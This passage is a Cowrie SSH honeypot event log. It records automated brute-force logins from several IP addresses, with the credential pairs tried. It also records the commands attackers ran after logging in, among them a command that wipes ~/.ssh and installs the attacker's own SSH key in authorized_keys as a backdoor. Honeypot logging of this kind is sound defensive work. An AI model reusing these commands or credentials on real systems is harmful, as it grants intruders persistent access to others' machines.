m@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:37:08.601373Z","src_ip":"212.227.235.229","session":"103973eae929"}
{"eventid":"cowrie.login.success","username":"root","password":"Huawei@5tgb","message":"login attempt [root/Huawei@5tgb] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:37:09.134602Z","src_ip":"212.227.235.229","session":"103973eae929"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:37:09.432014Z","src_ip":"212.227.235.229","session":"103973eae929"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:37:09.432696Z","src_ip":"212.227.235.229","session":"103973eae929"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:37:09.433697Z","src_ip":"212.227.235.229","session":"103973eae929"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:37:09.558309Z","src_ip":"212.227.235.229","session":"103973eae929"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:37:09.820622Z","src_ip":"212.227.235.229","session":"103973eae929"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:37:09.821339Z","src_ip":"212.227.235.229","session":"103973eae929"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:37:09.947082Z","src_ip":"212.227.235.229","session":"103973eae929"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:37:09.947954Z","src_ip":"212.227.235.229","session":"103973eae929"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36668,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4ff362f7f75","protocol":"ssh","message":"New connection: 212.227.235.229:36668 (1.2.3.4:22) [session: a4ff362f7f75]","sensor":"my-vps","timestamp":"2025-09-08T13:37:10.064480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:37:10.065358Z","src_ip":"212.227.235.229","session":"a4ff362f7f75"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:37:10.186962Z","src_ip":"212.227.235.229","session":"a4ff362f7f75"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:37:10.713437Z","src_ip":"212.227.235.229","session":"a4ff362f7f75"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:37:11.836228Z","src_ip":"212.227.235.229","session":"a4ff362f7f75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40064,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d142627d4c5","protocol":"ssh","message":"New connection: 212.227.235.229:40064 (1.2.3.4:22) [session: 6d142627d4c5]","sensor":"my-vps","timestamp":"2025-09-08T13:37:11.955165Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:37:11.955959Z","src_ip":"212.227.235.229","session":"6d142627d4c5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:37:12.074751Z","src_ip":"212.227.235.229","session":"6d142627d4c5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:37:12.591143Z","src_ip":"212.227.235.229","session":"6d142627d4c5"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:37:12.711390Z","src_ip":"212.227.235.229","session":"103973eae929"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:37:12.712286Z","src_ip":"212.227.235.229","session":"6d142627d4c5"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":50934,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9f3321f6dca","protocol":"ssh","message":"New connection: 134.199.174.250:50934 (1.2.3.4:22) [session: d9f3321f6dca]","sensor":"my-vps","timestamp":"2025-09-08T13:37:22.589533Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:37:22.590402Z","src_ip":"134.199.174.250","session":"d9f3321f6dca"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:37:22.931325Z","src_ip":"134.199.174.250","session":"d9f3321f6dca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53896,"dst_ip":"1.2.3.4","dst_port":22,"session":"5575d793be8a","protocol":"ssh","message":"New connection: 212.227.235.229:53896 (1.2.3.4:22) [session: 5575d793be8a]","sensor":"my-vps","timestamp":"2025-09-08T13:37:23.094731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:37:23.095589Z","src_ip":"212.227.235.229","session":"5575d793be8a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:37:23.323876Z","src_ip":"212.227.235.229","session":"5575d793be8a"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123","message":"login attempt [ftpuser/123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:37:24.109968Z","src_ip":"134.199.174.250","session":"d9f3321f6dca"}
{"eventid":"cowrie.login.failed","username":"git","password":"1234","message":"login attempt [git/1234] failed","sensor":"my-vps","timestamp":"2025-09-08T13:37:24.286712Z","src_ip":"212.227.235.229","session":"5575d793be8a"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:37:25.426632Z","src_ip":"134.199.174.250","session":"d9f3321f6dca"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:37:25.513754Z","src_ip":"212.227.235.229","session":"5575d793be8a"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":46392,"dst_ip":"1.2.3.4","dst_port":22,"session":"9310962eeb80","protocol":"ssh","message":"New connection: 49.247.35.31:46392 (1.2.3.4:22) [session: 9310962eeb80]","sensor":"my-vps","timestamp":"2025-09-08T13:37:26.540925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:37:26.543900Z","src_ip":"49.247.35.31","session":"9310962eeb80"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:37:26.821457Z","src_ip":"49.247.35.31","session":"9310962eeb80"}
{"eventid":"cowrie.login.success","username":"root","password":"09N1RCa1Hs31","message":"login attempt [root/09N1RCa1Hs31] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:37:27.936959Z","src_ip":"49.247.35.31","session":"9310962eeb80"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:37:28.515238Z","src_ip":"49.247.35.31","session":"9310962eeb80"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:37:28.515887Z","src_ip":"49.247.35.31","session":"9310962eeb80"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:37:28.516803Z","src_ip":"49.247.35.31","session":"9310962eeb80"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:37:28.801334Z","src_ip":"49.247.35.31","session":"9310962eeb80"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:37:29.445826Z","src_ip":"49.247.35.31","session":"9310962eeb80"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:37:29.446510Z","src_ip":"49.247.35.31","session":"9310962eeb80"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:37:29.718522Z","src_ip":"49.247.35.31","session":"9310962eeb80"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:37:29.719395Z","src_ip":"49.247.35.31","session":"9310962eeb80"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":12461,"dst_ip":"1.2.3.4","dst_port":22,"session":"600163b7c0fa","protocol":"ssh","message":"New connection: 49.247.35.31:12461 (1.2.3.4:22) [session: 600163b7c0fa]","sensor":"my-vps","timestamp":"2025-09-08T13:37:30.001159Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:37:30.018237Z","src_ip":"49.247.35.31","session":"600163b7c0fa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:37:30.301307Z","src_ip":"49.247.35.31","session":"600163b7c0fa"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:37:31.457580Z","src_ip":"49.247.35.31","session":"600163b7c0fa"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:37:32.755455Z","src_ip":"49.247.35.31","session":"600163b7c0fa"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":45729,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbc4a563acb7","protocol":"ssh","message":"New connection: 49.247.35.31:45729 (1.2.3.4:22) [session: bbc4a563acb7]","sensor":"my-vps","timestamp":"2025-09-08T13:37:33.038220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:37:33.058931Z","src_ip":"49.247.35.31","session":"bbc4a563acb7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:37:33.353954Z","src_ip":"49.247.35.31","session":"bbc4a563acb7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:37:34.515283Z","src_ip":"49.247.35.31","session":"bbc4a563acb7"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:37:34.820490Z","src_ip":"49.247.35.31","session":"9310962eeb80"}
